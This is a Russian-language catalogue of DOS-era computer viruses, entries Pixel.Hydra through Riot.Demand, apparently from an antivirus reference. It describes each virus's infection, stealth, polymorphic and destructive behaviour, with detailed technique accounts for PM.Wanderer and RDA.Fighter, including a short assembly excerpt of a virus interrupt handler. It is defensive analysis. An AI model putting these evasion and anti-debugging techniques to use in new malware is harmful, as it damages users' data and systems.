Pixel.Hydra.340, 342, 343, 368, 372, 391, 403, 495

Опасные нерезидентные вирусы. Некоторые версии вирусов удаляют файл COMMAND.COM, или портят все EXE-файлы в текущем каталоге, или записывают в EXE-файлы код, который выводит текст "Who is John Galt?", или переназначают INT 4, INT 40h на INT 9 или на INT 13h, или выводят текст:
HYDRA
Copyright © 1991 by C.A.V.E.
Также содержат текст "HyDra-X Beta - Not For Release.", где X - порядковый номер версии вируса.

Pixel.Hydra.736

Неопасный нерезидентный вирус. Иногда выводит на экран сообщение:
HYDRA
Watch for the many heads.
The first eight are easy to find and kill.
Their replacements will be more sophisticated.
© 1991 - C. A. V. E.
Содержит тексты "HyDra Beta - Not For Release.", "Copyright © 1991 by C.A.V.E.", "Coalition of American Virus Engineers", "-=-=- Dedicated to supporting the anti-virus industry without recognition or reward. -=-=-".

Plague.2647

Неопасный резидентный стелс-вирус. При открытии инфицированных файлов (f.3Dh INT 21h) удаляет свой код из них. При закрытии (f.3Eh INT 21h) снова заражает. Внедряет команды межсегментного перехода на свой код в оригинальный обработчик INT 21h. При заражении файлов на флоппи-диски проверяет наличие защиты от записи на диск посредством чтения и обратной записи Boot-сектора данного диска. Содержит строку "PLAGUE".

PlayGame.2000

Неопасный файлово-загрузочный вирус. Заражает EXE-файлы при доступе к ним через INT 21h и MBR жесткого диска при первом старте инфицированной программы. Инсталляция в память TSR-копии вируса производится при загрузке системы с "винчестера". Содержит текстовые строки "[ MK / TridenT ]" и "CO4DSCCLVSNEHTTBVIF-FIGIIMRAFEMTBR". Не заражает программы, которые начинаются с двух букв, имеющихся в последней строке. Вирус предлагает поиграть в игру, смысл которой сводится к провождению "улыбающейся рожицы" код ASCII 02 между двигающимися препятствиями код ASCII 254. В процессе анализа вируса я даже поиграл в данную игрушку. Дошел аж до 2 уровня...

Ply.based (Ply.3360,3486,3759,3768,4224,4722,5133,5175)

Опасные нерезидентные пермутирующие (pemutating) вирусы. Данные вирусы не являются, ни шифрованными, ни полиморфными вирусами. Но алгоритм создания своих вирусных копий очень близок к полиморфным алгоритмам. Каждая ассемблерная команда вируса занимает не более 3 байт, эти 3 байта в свою очередь составляют некую вирусную компоненту. Если ассемблерная инструкция занимает менее 3 байт в компоненте, то вирус "разбавляет" ее NOP-командами. Причем в случайный момент времени эти NOP'ы могут изменять свое местоположение ("плавать") в компоненте. Вирусы состоят из 3 блоков: основной блок, блок данных и блок тождественных вызовов. Также в случайный момент времени вирусы могут переносить данные трехбайтовые компоненты из основного блока в блок тождественных вызовов и заменять их на JUMP или CALL в основном блоке. И наоборот из блока тождественных вызовов в основной блок в первоначальном виде. Таким образом, одинаковые инфицированные файлы могут не совпадать ни в одном байте основного вирусного блока. Различные модификации вируса могут не заражать следующие файлы: AVP,AVPLITE,AVPVE,BAIT,EICAR, EMM386, F-PROT, FV386, FV86, MSAV, MVTOOL10, SCAN, TBSCAN,TBAV,TBCHECK, TBCLEAN, TBDISK, TBDRIVER, TBFILE, TBGENSIG, TBKEY,TBLOG,TBMEM,TBSETUP, TBSCANX,TBUTIL,VALIDATE,VIRSTOP,VIRUS,VPIC,VSAFE. Ply.4722, 5133, 5175 удаляют файл \NCDTREE.

PM.Wanderer

Неопасный резидентный полиморфный вирус, использующий защищенный (виртуальный) режим процессоров i80386-Pentium. Для установки своей резидентной копии в память и переключения в защищенный режим процессора (Protected Mode) использует документированный интерфейс VCPI (Virtual Control Programm Interface) драйвера расширенной памяти EMS (EMM386). Вирус заражает COM и EXE-файлы при их запуске или открытии (f.4b00h, f.3dh Int 21h). При старте инфицированной программы, вирусный полиморфный декриптор расшифровывает основное тело вируса и передает ему управление. Далее основной вирусный код выделяет участок памяти в верхних адресах, копирует в него собственный код и передает ему управление. Затем он восстанавливает код инфицированного файла в программном сегменте (для EXE-файлов также производит настройку адресов перемещаемых элементов) и приступает к непосредственному внедрению в память своей резидентной копии. Первым делом вирус пытается выяснить установлен ли в системе драйвер EMS. Для этого он получает адрес прерывания INT 67h и проверяет наличие строки EM* в заголовке драйвера. Далее вирус проверяет не находится ли уже в памяти его резидентная копия - вызывает функцию AX=0BABAh INT 21h и проверяет ответ AX=0FA00h. Если драйвер EMS не установлен в системе или вирусная резидентная копия уже находится в памяти, а также в дальнейшем -при отсутствии интерфейса VCPI, вирус освобождает ранее выделенную память и отдает управление программе-вирусоносителю, заканчивая тем самым свою "жизнедеятельность" в системе. Если же "условия флоры" благоприятствуют, то вирус "перехватывает" INT 01 и трассирует INT 21h с целью нахождения определенной последовательности байт, присутствующих в оригинальном обработчике INT 21h MS - DOS версий 5.00 - 7.00. Если данная последовательность обнаружена, то вирус запоминает адрес ядра обработчика INT 21h, обычно расположенного в области HMA. В дальнейшем вирус будет использовать этот адрес для вызова INT 21h при заражении файлов. Дальнейшие действия вируса - проверка наличия в системе интерфейса VCPI и получение 4-ех адресов страниц памяти. Затем вирус получает адрес интерфейса VCPI, таблицу страниц и адрес глобальной дескрипторной таблицы GDT (Global Descriptor Table), состоящей из трех элементов (первый - дескриптор сегмента кода, два другие - используются драйвером VCPI). Вирус записывает в таблицу страниц ссылку на страницы, выделенные им драйвером VCPI, получает физический адрес страницы памяти сегмента, в котором вирус в данный момент находится. Потом получает регистры глобальной дескрипторной таблицы GDT и дескрипторной таблицы прерываний IDT (Interrupt Descriptor Table). Далее вирус создает три собственных дескриптора (кода и данных) и дескриптор сегментов состояния задачи TSS (Task State Segment) в глобальной дескрипторной таблице GDT, подготавливает значения для регистров CR3, GDTR,IDTR,LDTR, TR и адрес CS:EIP точки входа в защищенный режим и производит переключение процессора в защищенный режим работы с наивысшим уровнем привилегий - 0. В защищенном режиме вирус корректирует таблицу GDT, создавая в ней два собственных дескриптора сегментов и производит поиск дескриптора TSS. После чего вирус устанавливает две аппаратные контрольные точки по командам (Breakpoints) на первый байт кода обработчика INT 21h (адрес 0000:0084h) и на первый байт кода в BIOS по адресу 0FE00:005Bh (линейный адрес 0FE05Bh). Обычно в BIOS по адресу 0FE00:005Bh находится команда перехода (Near Jump) на процедуру перезапуска компьютера. Затем вирус корректирует дескрипторную таблицу прерываний таким образом, чтобы установить на прерывания: 1 (особый случай отладки) и 9 (клавиатура) собственные дескрипторы обработчиков данных прерываний. После этих приготовлений вирус копирует свой код в страницу памяти, полученную им еще до входа в защищенный режим и производит переключение процессора в виртуальный режим работы. Вирусный обработчик INT 09 производит контроль за наличием и (или) восстановлением своих двух контрольных аппаратных точек. А также, данный обработчик отслеживает нажатие на Ctrl-Alt-Del и в этом случае "сбрасывает" все аппаратные контрольные точки. Вирусный обработчик особого случая отладки проверяет произошло ли нарушение одной из двух "вирусных" контрольных точек по адресу команды.Если управление в данный обработчик попало из точки, находящейся "на процедуре" в BIOS - перезагрузки компьютера, то вирус сбрасывает все аппаратные контрольные точки, так же, как и обработчик INT 09 при нажатии на Ctrl-Alt-Del. Если же нарушение вызвано контрольной точкой оригинального обработчика INT 21h, то вирус анализирует значение регистра AX (или AH) с целью определения функции прерывания INT 21h и в зависимости от этого предпринимает различные действия. Если AX=0BABAh, то вирус считает, что данный вызов исходит от его "собрата",записывает в AX значение 0FACCh и возвращает управление оригинальному обработчику INT 21h. Если AX=3506h (получить адрес прерывания INT 06;обычно такой вызов существует во всех программах, написанных на языках высокого уровня: C, Pascal,...), то вирус пытается найти в пространстве линейных адресов 0-90000h некоторую последовательность байт, очевидно, принадлежащих программе ADinf (Дмитрию Мостовому - автору ADinf, не удалось найти такую версию ADinf от 10.00 до 11.01, в которой данная последовательность байт бы присутствовала). Если данная последовательность будет вирусом найдена, то он неким образом модифицирует найденный код, так, чтобы управление не попадало на вызов какой-то межсегментной процедуры. Если AX=4B00h (запуск программы) или AH=3dh и AL не равно ?Fh (открытие файла только на чтение), то вирус копирует свой код по адресу 9000:0000h (линейный адрес 90000h),переключает процессор в виртуальный режим работы и отдает управление своему коду, находящемуся в пределах первого мегабайта в сегменте 9000h. Вирус проверяет последние две буквы расширения имени файла и производит создание своей полиморфной копии и заражение файлов размером более 4K. Причем вирус внедряет свой код в начало COM или в середину (сразу же за заголовком) EXE-файлов, запоминая оригинальный программный код в конце файлов."Реальный рабочий код" вируса составляет 3684 байт, но на практике инфицированные файлы имеют приращение длины более 3940 байт.При возникновении любой ошибки в процессе заражения или при выходе из виртуального режима процессора вирус вызывает INT 21h с AX=4B00h для вызова особого случая исключения и возвращения управления оригинальному обработчику INT 21h. Вирус в своем теле содержит текст "WANDERER,© P. Demenuk". По этой строке, видимо,можно сделать выводы, что автором данного "шедевра" следует считать московского человека - Петра Деменюка. Через три года Петя создал все-таки свой новый "великолепный продукт, достойный восхищения...". Из всего вышесказанного следует, что обнаружить резидентную копию данного вируса, находящегося в нулевом кольце защищенного режима процессора обычными способами невозможно. Для обнаружения вируса в памяти необходимо переключаться в защищенный режим с наивысшими привилегиями и по таблицам GDT или IDT производить его поиск. Но попытаться обнаружить признаки вируса в системе можно и обычными способами. Для этого необходимо прочитать линейные адреса двух первых аппаратных контрольных точек (0 и 1) и сравнить их со значениями, которые описаны выше. На основании наличия определенных адресов и делается вывод о возможности нахождения вируса PM.Wanderer в памяти компьютера. Теперь немного о результатах тестирования. При заражении нескольких тысяч файлов-жертв вирус проявил себя, как "жилец" - все зараженные файлы оказались работоспособными. Здесь надо только сделать поправку - файлы могут оказаться неработоспособными в том случае, если их стек после заражения окажется в области вирусного кода. PM.Wanderer при заражении файлов не корректирует значения стартовых SS:SP. Как уже отмечалось выше, вирус сохраняет способность к воспроизводству,только в том случае, если в системе установлен драйвер EMS (EMM386). При установленном драйвере EMM386 с ключом NOEMS, вирус перезагружает компьютер. Компьютер также может перезагрузиться, если в системе используется драйвер QEMM386. Самое интересное в том,что если в системе находился резидентный вирус, а потом произошла загрузка Windows 3.1x или Windows'95, то вирус не сможет размножаться в данных операционных средах, но при выходе в DOS, вирус опять получает управление и может "трудиться не покладая рук". Если же вирус будет запущен в Windows DOS- окне, то из-за отсутствия интерфейса VCPI вирус не сможет переключиться в защищенный режим. Под OS/2 вирус - нежизнеспособен, также из-за отсутствия VCPI. В заключение стоит отметить, что это первый известный вирус (причем, российский), использующий защищенный (виртуальный) режим работы процессора и не конфликтующий с операционными системами "от Microsoft", работающими также в защищенном режиме.

PME - вирусы

PME (Phantasie Mutation Engine) - полиморфные генераторы вирусных шифровщиков и расшифровщиков. Создан китайским вирусописателем по кличке Burglar. Существуют две версии данного генератора. Они содержат тексты:
PME v1.00 © Jan 1995 By Burglar
PME v1.01 © Feb 1995 By Burglar

PME.Burglar

Опасный резидентный полиморфный вирус. Иногда вешает систему и выводит текст:
Hello! This is [Super Virus-2] ... written by Burglar in Taipei, Taiwan

Polimer.512

Неопасный нерезидентный вирус. При старте вирус выводит сообщение "A legjobb kazetta a POLIMER kazetta ! Vegye ezt !". Содержит строку "ERROR".

Polska.4004

Неопасный вирус. В 1994 году 7 и 23 числа каждого месяца до июля выводит в графическом режиме поднимающийся на флагштоке развивающийся бело-красный польский флаг, на котором написано "TERAZ POLSKA" и в левом вернем углу текст:
TERAZ POLSKA v2.0
produced by NoName
All rights reserved
© 93.12.22 POLAND

Poro.1257

Опасный резидентный вирус. С 15 по 25 сентября выводит на экран текст:
С Днем рождения, Аллочка !
Наилучшие пожелания твоему Hard Disk'у !
При записи на диск (f.03 Int 13h) вирус пытается найти словосочетания
"Bori", "BORI", "Бори" и "БОРИ" и заменить их соответственно на "Poro",
"PORO", "Поро" и "ПОРО". Содержит зашифрованный текст "Turbo Bugger ©
1994 Dedicated to Alla R. Borisyuk ( МЕХ-МАТЬ 307 )".

Poruchik.2774

Написан для процессора 386. Устанавливается резидентно в верхние адреса памяти. При смене директория (f.3Bh INT 21h) вирус производит поиск файлов *.exe и заражает их. Содержит текст: "Поручик Лозинский, раздайте Aidstestы".

Possessed.2175, 2367, 2438, 2443, 2446 (1,2)

Опасные резидентные вирусы. Иногда удаляют файлы. Рисуют на экране в графическом видеорежиме улыбающееся лицо. Выводят текст "POSSESSED! Bwa! ha! ha! ha! ha!". Также содержат строку "Author: JonJon Gumba of AdU".

Predator.1063,1072 (2),1137,1148,1154,1195

Опасные резидентные самошифрующиеся, кроме Predator.1063, вирусы. Перехватывают INT 21h и INT 13h. При чтении секторов через INT 13h вирусы могут испортить значение одного случайно выбранного бита в буфере считанных секторов. Содержат текстовые строки:
Predator.1072 (1): Predator virus © Mar. 93 Priest
Predator.1072 (2):
Predator Strain B © 1993 Priest - Phalcon/Skism
Predator.1063,1137,1148,1154,1195:
Predator virus © Mar. 93
In memory of all those who were killed...
Wookies ain't the only ones that drop! Priest

Predator.2448

Резидентный файлово-загрузочный полиморфный вирус. При старте инфицированного файла трассирует INT 13h и INT 21h, становится резидентно в верхних адресах памяти. Может "внедриться" в оригинальный обработчик INT 21h, произведя изменение его 5ти первых байт. Заражает MBR и Boot-сектора дискет, причем загрузочный сектор диска шифрует и "прячет": для жесткого диска в секторе 2, для дискет - в первом секторе последней дорожки. Содержит текстовую строку: Predator virus #2 © 1993 Priest - Phalcon/Skism

Pretentious.680

Неопасный нерезидентный вирус. Иногда выводит на экран текст:
Windows 95 may be dangerous.
OS/2 is the best operating system!
I`ll prove it soon...
Также содержит строку "* Gdynia 1996 * v1.0 *".

Priest.1416

Нерезидентный очень опасный вирус. Заражает COM и EXE-файлы в текущей директории. Если номер месяца совпадает со значением дня, то вирус считывает 9 первых секторов жесткого диска в память, уничтожает их на диске, а затем выводит текст:
Я великий вирус ЖРЕЦ !!! Только что я стер ваши BOOT,MBR и FAT.
Не расстраивайтесь ,эта жертва будет принесена только если
вы не отгадаете загадку (отвечайте латинскими буквами) :
Какой в КМУГЕ самый лучший факультет :
Если ответить, что fareo, то вирус восстановит первые сектора диска.
Также в 16 часов вирус может вывести сообщение:
"Hello i'm virus Crazy Priest !!!
Мне очень жаль,но в жертву был принесен файл " - дальше идет имя файла.
В данный файл вирус будет записывать случайную информацию, до тех пор,
пока не будет нажата клавиша "Space" - "Пробел". 15 августа выводит
текст: "HAPPY BIRTHDAY CRAZY !!!".

Printerceptor

Опасный резидентный стелс-вирус-спутник. Перехватывает INT 21h. Блокирует вывод на принтер. Содержит строку "Printerceptor".

Privet.1152

Неопасный резидентный вирус. При старте может вывести текст "привет всем". также содержит тексты "*.exe skh", "плохо дело".

Problem.734, 845, 854, 856, 857, 863

Неопасные резидентные вирусы. Problem.854, 856, 863 содержат текст "THIS IS YOUR PROBLEM !", Problem.857 - "by Mojo Risin for 1605", Problem.845 - "dATA kILLER !".

Procuror

Очень опасный Boot-вирус. Имеет различные загрузчики для жестких и гибких дисков. При загрузке с гибкого диска может отформатировать начальную дорожку первого жесткого диска. Оригинальный MBR шифрует и прячет в 7 секторе первой дорожки. Для гибких дисков оригинальный Boot-сектор и 2 сектора своего продолжения записывает в последние 3 сектора последней дорожки. При загрузке с флоппи-диска прехватывает INT 1Eh и INT 13h. При загрузке с "винчестера" перехватывает INT 08h (таймер), INT 13h, INT 17h (вывод на принтер). При выводе на принтер цифр 0-4, вместо них выводит значения увеличенные на 1, вместо цифры 5 выводит 0. Примерно через 30 минут работы после загрузки в буфер клавиатуры помещает слово "PROCUROR". Может изменить значение часов реального времени в CMOS-памяти.

Prohibit.1500

Неопасный резидентный шифрованный стелс-вирус. При открытии файла вирус удаляет свой код из файла, при его закрытии снова заражает его. Иногда выводит текст "Will see you next time . Stone 93". Также содержит текст "Prohibit MARYJUANA".

Promiscuo.2725

Опасный резидентный полиморфный вирус. Уничтожает файлы ANTI-VIR.DAT, CHKLIST .MS,,"©1996 por pRoMisCuO sExUaL!!".

Prowler.1543

Неопасный резидентный файлово-загрузочный шифрованный вирус. 13 числа при загрузке системы с инфицированного жесткого диска вирус выводит в графическом режиме шагающего из правого нижнего угла в левый нижний угол экрана маленького человечка и выводит текст:
I am Еhe MidnighЕ Pr0wler, s0n 0f Еhe m00n
And I am the child 0f Еhe generaЕi0n....

Prowler.2379

Очень опасный резидентный полиморфный вирус. При открытии файлов конфигурации некоторых почтовых программ (SF-MAIL.CFG и T-MAIL.CTL), вирус дописывает в их конец строки паролей:
[Miscellaneous]
DoorWay_Password 'GLORY'
или
T-Password GLORY
Причем данные записи будут находиться за 80 столбцом экрана, т.е., при просмотре содержимого данных файлов в обычном тестовом редакторе эти записи будут не видны.

R

Radio101.1000

Неопасный шифрованный вирус. Примерно, через 53 минуты после старта вирус выводит текст "Paдио 101". Содержит текстовую строку "Без паники-идем ко дну!Ver 2.01".

Radio 101.2076

Неопасный полиморфный резидентный вирус.Примерно, через 5 минут после старта вирус выводит текст "Радио 101-наслаждение даже при половине громкости!".

Raiden.1433

Неопасный файлово-загрузочный вирус. Заражает MBR жесткого диска и EXE- файлы. При старте инфицированной программы с некой командной строкой (вирус считает CRC данной строки), вирус может произвести самолечение данной программы.

Rain

Опасный загрузочный вирус. В 19:15 уничтожает 2 сектора на головке-1, цилиндре-0 и с сектора-1, где, как правило, находится загрузочный сектор активного раздела, записывая туда вирусный код. Содержит текст
This is only a demo version made for Germany. New versions coming soon.
Written in the rain..

Rake.975

Неопасный резидентный вирус. Пытается не заражать файлы, содержащие в своем теле строки "ИРУС", "IRUS", "виру" или "viru". Может перемещать свою резидентную копию по различным адресам памяти.

RaseK.1489, RaseK.1490, RaseK.1492

Очень опасные файлово-загрузочные вирусы. Заражают COM, EXE-файлы и MBR жесткого диска. Также внедряют деструктивный код в Boot-сектора дискет, не сохраняя оригинальный сектор. При загрузке с такого флоппи-диска вся информация на первом жестком диске будет уничтожена. Вирусы также могут уничтожить информацию на "винчестере" при загрузке с жесткого диска. Вирусы перехватывают INT 13h и INT 21h. Используют стелс-механизм при попытке чтения MBR, скрывают приращение длины зараженных файлов. Не заражают файлы, содержащие строку AND.COM (COMMAND.COM). В теле вирусов присутствуют строки:
RaseK.1489 - "RaseK v2.1,from LA CORUеA(SPAIN).Mar93";
RaseK.1490 - "RaseK v2.0,from LA CORUеA(SPAIN).Mar93";
RaseK.1492 - "RаseKо v3.1,from La Coruдa(SPAIN).Ap93".

Raving.2300

Опасный нерезидентный вирус, создающий новые COM-файлы вместо найденных. Выводит приглашение "C:\>", после чего ждет нажатий на клавиши и выводит случайные символы вместо введенных. После этого выводит текст:
I DON'T THINK YOU WOULD LIKE TO SMILE, BECAUSE I HAVE INFECTED A FILE!!!
HAVE YOU HEARD OF A RAVING VIRUS MC, YES YOU GUESSED IT THAT IS ME!!!
YOU WONT SEE ANOTHER RHYME UNTIL IT IS INFECTING TIME!!!

RDA.Fighter.5871, 5969, 7408, 7802, 7868

RDA.Fighter.5871, 5969, 7802, 7868 -это резидентные сложнополиморфные вирусы, заражающие файлы в формате COM и EXE. RDA.Fighter.7408 - файлово-загрузочный полиморфный вирус (заражает COM, EXE-файлы и MBR жесткого диска), скрывающий приращение свой длины в инфицированных файлах. RDA.Fighter.7802 помимо полиморфных расшифровщиков имеет также полиморфный механизм случайной расшифровки собственного кода. При неаккуратной трассировке RDA.Fighter.5969, 7408 могут уничтожить случайные сектора на жестком диске. Получив управление, основной расшифрованный код вирусов получает из часов реального времени случайное 32 разрядное значение, используемое вирусами для расшифровки еще одного своего участка кода. После всевозможных умножений, делений, сложений, вычитаний из 32хразрядного случайного числа получается базовое 16 разрядное случайное число в регистре AX. Это число умножается на 2 в регистре DI. Этот регистр DI будет указывать точку входа в таблицы комбинаций вирусных расшифровывающих команд. Существует 2 таблицы по 16 комбинаций расшифровывающих команд, некоторые из которых повторяются. Эти таблицы представлены ниже. Назовем эти таблицы: "первая" и "зеркальная". Далее, на основе установленных бит 16 разрядного числа в регистре AX, выбирается расшифровывающая команда из первой таблицы, в зависимости от регистра DI. Например, если нулевой бит установлен в 1, то берется команда из таблицы (команду в таблице выбирает регистр DI), которая копируется в тело расшифровщика с помощью антиотладочных команд манипуляции стеком. В тело расшифровщика также заносится некоторая первоначальная константа, с помощью которой могут производиться операции расшифрования, и которая в цикле расшифровки будет динамически изменяться по определенному закону. Данный закон направлен против отладчиков. По окончании цикла данной расшифровки значение регистра DI устанавливается на следующую команду в первой таблице. Потом данная операция производится для всех установленных битов в 16 разрядном значении AX. Если какой-либо бит не установлен, то цикл не проводится, а значение DI передвигается на следующую команду. Если указатель DI выходит за рамки последней 16 команды в таблице, то его значение устанавливается на первую команду таблицы. Как только все биты в AX исчерпаны, вирусы приступают к проверке того, что они всеми этими хитроумными комбинациями расшифровали. Делают они это также хитроумным способом. Они подсчитывают контрольную сумму расшифрованного участка кода в зависимости от участка кода, который не был зашифрован. Подсчет CRC производится "веером", от границы расшифровки и вверх, и вниз подсчитывается 48 разрядное значение. При подсчете CRC используются всевозможные команды пересылки, ADD, XOR,... Причем, вирусы RDA.Fighter.5969, 7408 использует еще и дополнительную динамическую корректировку CRC с помощью INT 01. А вирус RDA.Fighter.7408 дополнительно имеет 4 различных варианта подсчета CRC, меняющихся от копии к копии. Полученное значение CRC хранится в регистрах AX, BP и DX. Регистр BP складывается с числом, хранящимся в теле вируса, корректируется относительно нахождения базовой точки вируса в памяти и значение по смещению BP сравнивается с полученным значением DX. Причем, в случае правильной расшифровки смещение хранения CRC должно находиться в ранее зашифрованной области вируса. Если полученное значение CRC не совпадает со значением DX, то вирусы повторяют описанную выше комбинацию, только в качестве таблицы расшифровывающих команд теперь будет использоваться зеркальная таблица. А делается это для того, чтобы возвратить в исходное состояние ранее расшифрованную по "неправильному" закону область вирусного кода. После того, как вирус возвратит все в исходное состояние, попытка "правильной" расшифровки повторяется сначала, начиная с получения случайного числа в регистре AX, и использования в качестве базовой - первой таблицы расшифровывающих команд. Вирусы будут "прокручивать" весь цикл с 16 разрядами регистра AX, потом тот же вариант повторять с зеркальной таблицей и т.д., до тех пор, пока, наконец, они не удостоверятся, что все расшифровалось правильно. Но, так как, вирусы постоянно "следят" за отладчиком, следует помнить, что в разрывах между попытками расшифровки вирусного кода можно угодить в "опасный" код, уничтожающий информацию в секторах жесткого диска, описанный выше. RDA.Fighter.7802, 7868 "разбавляют" инструкции кода случайной расшифровки командами-"мусором" (такие команды, которые не влияют на результат расшифровки). А также "первая", и соответствующая ей "зеркальная" таблица, будут отличаться для каждого экземпляра вирусов RDA.Fighter.7802, 7868. Резидентные части вирусов контролируют функции запуска программ ( AX=4B00h) и открытия файлов (AH=3Dh). RDA.Fighter.5969 также контролирует функцию переименования файлов (AH=56h). При вызове данных функций вирусы пытаются заразить файлы, длина которых не меньше, чем 4096 байт. RDA.Fighter.7408, 7802, 7868 дополнительно контролируют функции поиска файлов (AH=11h,12h,4Eh,4Fh) и скрывают приращение своей длины у инфицированных файлов. В конце каждого зараженного файла RDA.Fighter.7408, 7802, 7868 хранят 2 байта размера вирусного кода, внедренного в данный файл. RDA.Fighter.7408, 7802, 7868 "перехватывают" также INT 08 и несколько замедляют работу компьютера. Резидентная активная копия вируса RDA.Fighter.7408 при вызове функции AX=0EEEEh удаляет свой код из MBR жесткого диска. RDA.Fighter.7408, 7802, 7868 при вызове данной функции также и обезвреживает себя в памяти. Резидентные копии вирусов используют очень мощный помехозащищенный алгоритм восстановления собственного кода, позволяющий не допустить отладку кодов вирусов с использованием отладочных точек останова. Мало того, вирусы "ради шутки" пытаются ввести в заблуждение, внедряя сразу в свои обработчики INT 21h инструкцию выхода из прерывания- IRET! Но оригинальные байты обработчика вирусы сами же и исправляют с помощью помехозащищенного алгоритма восстановления. Начальный код вирусных обработчиков INT 21h выглядит следующим образом (ниже представлен обработчик INT 21h вируса RDA.Fighter.5969):
PUSH AX
INC AH
CMP AX,4C00 ;запуск программы?
JE CHECK_FILES
CMP AH, 3E ;открытие файла?
JE CHECK_FILES
CMP AH, 57 ;переименование файла?
JE CHECK_FILES
DESTROY_HANDLER:
POP AX
JMP DWORD PTR CS:[ADR_INT21] ;выход в оригинальный INT 21h
CHECK_FILES:
CALL CHECK&RESTORE ;проверка и восстановление
MOV CS:DESTROY_HANDLER, 90CF ;вместо POP AX установить IRET?!
MOV CS:DESTROY_HANDLER+2, AX ;и регистр AX (4C00 или 3E??)
CALL CHECK&RESTORE ;проверка и восстановление
CALL CHECK_FILE_NAME ;а здесь уже никакой команды IRET ;не будет!
....................
Вирусы не заражают следующие файлы *ES?.* (AIDSTEST.EXE), *WE?.* (WEB.EXE), *AN?.* (COMMAND.COM). RDA.Fighter.7408 при старте программы CHKDSK "выключает" свой механизм скрытия истинной длины зараженных файлов. После завершения ее работы - снова "включает". В процессе инфицирования вирусы устанавливают свой обработчик критических ошибок INT 24h, дисковый обработчик INT 13h, если в системе нет дискового кэша и устанавливают обработчики INT 01 (пошаговое выполнение команд), INT 03 (точка останова) и INT 2Ah (Microsoft network) на свои обработчики, содержащие единственную инструкцию - IRET. При заражении файла, вирусы случайным образом выбирают (таким же, как и при определении регистра AX при попытках расшифровки своего кода) смещение и размер области, которая будет зашифрована в инфицируемом файле. Данная шифровка предназначена, видимо, для невозможности восстановления файлов специальными антивирусными утилитами (ADinfExt, TbClean,..).

RedArc - вирусы

Вирусы, изготовленные тульским "умельцем" Игорем Дикшевым 2:5022/12.23, известным более под кличкой Red Arc.

RedArc.Fraud

Неопасный нерезидентный вирус. Заражает EXE-файлы, внедряя свой код в начало файлов (переводя их в COM-формат), а зашифрованные оригинальные начальные байты переносит в конец файлов. При старте такого файла, вирус производит поиск и заражение EXE-файлов. После чего, если было произведено хоть одно заражение, вирус восстанавливает файл-жертву в исходное состояние ("самоизлечивается") и выводит текст "Bad command or file name".

RedArc.Helga.666

Опасный нерезидентный вирус. Разрушает файлы *.°*, *.ms. Иногда выводит текст:
ТЫ ХОТЕЛ УВИДЕТЬ НЕБО? ГОЛУБОЕ-ГОЛУБОЕ?
ТЫ ХОТЕЛ УВИДЕТЬ НЕБО?
НЕВИДАТЬ ЕГО СО МНОЙ!
и "завешивает" систему. Содержит строку "Helga".

RedArc.Stinger

Неопасный нерезидентный шифрованный вирус. Иногда выводит на экран строку "STINGER".

RedArc.Vesna.1000 (1,2), 1614, 1724, 1751, 1833

Опасные нерезидентные вирусы. Удаляют файлы ch*.* и *.°°°. И под мигание лампочек клавиатуры и дисководов система "зависает". Vesna.1751 не заражает файлы из списка (по 2 буквы на имя файла): aicodrwetbmsmvavscadutanatsdncvcdnwiioibvi. Различные версии вируса содержат следующие тексты "My name is GARRY", "*TULA*", "Это зделано в ТулE", "TULA", "Пришла весна !", "Здесь был Игорь Д.", "ОЛЕЧКА", "TYPE HAPPY BIRTHDAY GARRY".

RedLaugh.607

Неопасный резидентный вирус. При старте любой программы, вирус окрашивает экран в красный цвет и выводит текст:
Красный смех гуляет по стране...
01/21/96 by FDD.

Remute.779

Неопасный резидентный вирус. Содержит тексты "A long time ago,in very remute institut ...", "LIGHT in the DARK".

Renegade.1176

Опасный резидентный вирус. Заражает EXE-файлы при их запуске или при их открытии. Заражает довольно необычным способом: считывает 1024 последних байт файла, записывает на их место 1176 байт своего кода, а затем - считанные 1024 байта. При этих манипуляциях вирус не корректирует таблицу перемещаемых символов (relocation table), в результате чего инфицированная программа может быть неработоспособной. 11 числа каждого месяца выводит текст:
© Renegade 1994. Hello Hacker`s !!!

Renegade.4509

Очень опасный резидентный шифрованный файлово - загрузочный вирус. Заражает COM, EXE-файлы и MBR всех жестких дисков, присутствующих в компьютере. После 55 загрузок с инфицированного MBR вирус устраивает видеоэффект "плавающих" цветных линий по экрану, шифрует жесткий диск и выводит на экран "бегущей строкой" текст:
Please wait ...
Hey , LAMER ! Are you all right ?.. Not so good ?..
Oh, don't be afraid my little baby ,angry wolf if far away !......
bUt I aM sTiLL HeRe ! AnD i Am HuNGRrry ! Aaarrrgghhh !...
YoU iS _fOxPro or pAsCAL_pROGraMmeR , iSn't It ?...
Oogghh , YeEsss ! I WaNt to EaT YoU NoWww !
NoW YoU WiLL bEcOme ViCTiM of HACKER's REVENGE !
Внедряется в середину COM и EXE-файлов, корректируя адреса перемещаемых элементов для EXE-файлов. Не заражает файлы, содержащие в своем имени буквосочетания WEB, AIDS, ADINF, HIEW, CHKDSK,SCAN,VSAFE,MSAV,CLEAN,-V. Содержит тексты "Say THANKS to lovely Dr.Web for damage this file...", "© Renegade 1995.".

Reset.607

Неопасный вирус. Если значение минут системного времени больше 54, то вирус выводит на экран текст "For Main Menu press RESET".

Revelation.4096

Неопасный резидентный полиморфный вирус. В октябрьские воскресенья выводит на экран текст:
These things saith he that hold TASM in his right hand and walketh amongst the FAT tables, boot sectors, and partition tables. He that hath a VDU, let him see what I typeth unto the users: I have a few things against thee, because thou sufferest that whore software security, and commit anti-virus protection. Behold, I will cast thou unto limbo, and them that repent their deeds shall be spared the low-level drive format. Remember therefore how thou hast recieved and heard, and hold fast, and repent. If therefore thou shalt not repent, I will come on thee as a thief, and thou shalt not know what hour I will come upon thee.

Reverse.948

Неопасный резидентный вирус. Содержит строку "moc.dnammocexe.niamcn". Не заражает файл NCMAIN.EXE. Командный процессор COMMAND.COM заражает, внедряясь в область нулей, и не увеличивает его длину. Содержит еще одну текстовую строку "Red Spider Virus created by Garfield from Zielona Gora in Feb 1993".

Rex.1637

Опасный резидентный файлово-загрузочный полиморфный вирус. При заражении MBR "винчестера" не сохраняет оригинальный сектор. После 99 загрузок с инфицированного диска вирус производит некоторые манипуляции с клавиатурой (INT 16h). Содержит текст "REX".

Riot.309

Очень опасный нерезидентный вирус. Может уничтожить 1234 секторов диска C:. Первым делом стремится заразить файл c:\dos\doskey.com. Содержит текст "© 1994 Metal MilitiaImmortal Riot, Sweden".

Riot.Demand

Опасный overwriting вирус. Создает файл C:\INFERNAL.IR, в который записывает следующий текст:
Infernal Demand! © Metal Militia / Immortal Riot
Your misery is our pleasure!
Your nightmare is our dream!
Your hell is our paradise!
Your lost is our demand!
Your cry is our laugh!
And your fate is ours!

